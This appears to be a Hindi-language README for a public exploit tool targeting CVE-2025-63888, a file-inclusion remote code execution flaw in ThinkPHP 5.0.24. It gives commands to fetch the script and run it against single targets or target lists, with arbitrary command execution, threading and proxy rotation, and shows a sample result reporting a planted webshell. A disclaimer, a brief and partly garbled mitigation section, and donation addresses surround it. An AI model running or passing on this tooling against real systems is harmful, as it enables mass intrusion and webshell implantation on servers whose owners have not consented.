
CVE-2025-63888 (ThinkPHP 5.0.24 File Inclusion RCE भेद्यता) का पता लगाने और परीक्षण करने के लिए सुरक्षा अनुसंधान उपकरण
ThinkPHP 5.0.24 में CVE-2025-63888 भेद्यता का पता लगाने और परीक्षण करने के लिए एक सुरक्षा अनुसंधान उपकरण, जो फ़ाइल समावेशन हमलों के माध्यम से दूरस्थ कोड निष्पादन (RCE) की अनुमति देता है।
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। इस उपकरण का उपयोग केवल उन सिस्टम पर करें जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।
CVE-2025-63888 ThinkPHP 5.0.24 में एक गंभीर दूरस्थ कोड निष्पादन भेद्यता है। यह भेद्यता thinkphp/library/think/template/driver/File.php में स्थित read फ़ंक्शन में मौजूद है, जो हमलावरों को view() फ़ंक्शन में टेम्पलेट पथ में हेरफेर करके फ़ाइल समावेशन हमलों के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है।
CVSS स्कोर: 9.8 (गंभीर)
प्रभावित संस्करण: ThinkPHP 5.0.24 (सटीक संस्करण)
कमजोर फ़ाइल: thinkphp/library/think/template/driver/File.php
कमजोर फ़ंक्शन: read() विधि
# रिपॉजिटरी क्लोन करें
git clone https://github.com/AN5I/cve-2025-63888-exploit.git
cd cve-2025-63888-exploit
# निर्भरताएँ स्थापित करें
pip install -r requirements.txt
# स्क्रिप्ट को निष्पादन योग्य बनाएं (वैकल्पिक)
chmod +x cve_2025_63888_exploit.py
# स्क्रिप्ट डाउनलोड करें
wget https://raw.githubusercontent.com/AN5I/cve-2025-63888-exploit/main/cve_2025_63888_exploit.py
# निर्भरताएँ स्थापित करें
pip install requests
# एकल लक्ष्य
python3 cve_2025_63888_exploit.py -u http://target.com
# कस्टम कमांड निष्पादित करें
python3 cve_2025_63888_exploit.py -u http://target.com -c "whoami"
# फ़ाइल से कई लक्ष्य
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json
# तेज़ स्कैनिंग के लिए थ्रेडिंग के साथ
python3 cve_2025_63888_exploit.py -u http://target.com -t 5
# डिबगिंग के लिए वर्बोज़ आउटपुट
python3 cve_2025_63888_exploit.py -u http://target.com -v
# एकल प्रॉक्सी
python3 cve_2025_63888_exploit.py -u http://target.com --proxy http://proxy:port
# फ़ाइल से कई प्रॉक्सी
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt
-u, --url लक्ष्य URL
-f, --file लक्ष्य URL वाली फ़ाइल (प्रति पंक्ति एक)
-c, --command निष्पादित करने का कमांड (डिफ़ॉल्ट: id)
-t, --threads थ्रेड्स की संख्या (डिफ़ॉल्ट: 1)
-o, --output आउटपुट फ़ाइल (डिफ़ॉल्ट: uknf_results.json)
-v, --verbose वर्बोज़ लॉगिंग सक्षम करें
--proxy प्रॉक्सी URL (जैसे, http://127.0.0.1:8080)
--proxy-list प्रॉक्सी URL वाली फ़ाइल (प्रति पंक्ति एक)
स्क्रिप्ट विस्तृत परिणामों के साथ एक JSON फ़ाइल उत्पन्न करती है:
{
"target": "http://target.com",
"timestamp": "2025-11-20T15:05:35.763409",
"vulnerable": true,
"endpoint_found": true,
"exploitation_successful": true,
"command_executed": "id",
"output": "uid=1000(user) gid=1000(user)...",
"vulnerable_endpoint": "/index.php/index/index/view",
"webshell_created": true,
"webshell_path": "../../../runtime/log/2025/11/18.log"
}
view() फ़ंक्शन का उपयोग करके कमजोर एंडपॉइंट ढूंढता हैयदि आप ThinkPHP 5.0.24 का उपयोग कर रहे हैं:
तुरंत अपग्रेड करें:
पथ सत्यापन लागू करें:
view() फ़ंक्शन में सख्त पथ सत्यापन जोड़ें../, ..)कोड-स्तरीय सुधार:
realpath() का उपयोग करें कि फ़ाइलें अनुमत निर्देशिकाओं के भीतर हैंpython3 cve_2025_63888_exploit.py -u https://example.com
# लक्ष्य फ़ाइल बनाएं
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt
# स्कैन चलाएं
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json
python3 cve_2025_63888_exploit.py -u https://example.com -c "uname -a"
# एकल प्रॉक्सी
python3 cve_2025_63888_exploit.py -u https://example.com --proxy http://127.0.0.1:8080
# फ़ाइल से कई प्रॉक्सी
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt
योगदान का स्वागत है! कृपया बेझिझक एक पुल अनुरोध सबमिट करें।
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)यदि आपको कोई समस्या आती है या सुझाव हैं, तो कृपया GitHub पर एक मुद्दा खोलें।
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
यदि आपको यह उपकरण उपयोगी लगता है, तो कृपया इसे GitHub पर एक स्टार देने पर विचार करें!
यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इस प्रोग्राम के दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं हैं। उपयोगकर्ता किसी भी सिस्टम का परीक्षण करने से पहले उचित प्राधिकरण सुनिश्चित करने के लिए जिम्मेदार हैं।
यदि आपको यह उपकरण उपयोगी लगता है और आप परियोजना का समर्थन करना चाहते हैं:
Bitcoin (BTC):
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv
Ethereum (ETH):
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7
आपके समर्थन के लिए धन्यवाद! 🙏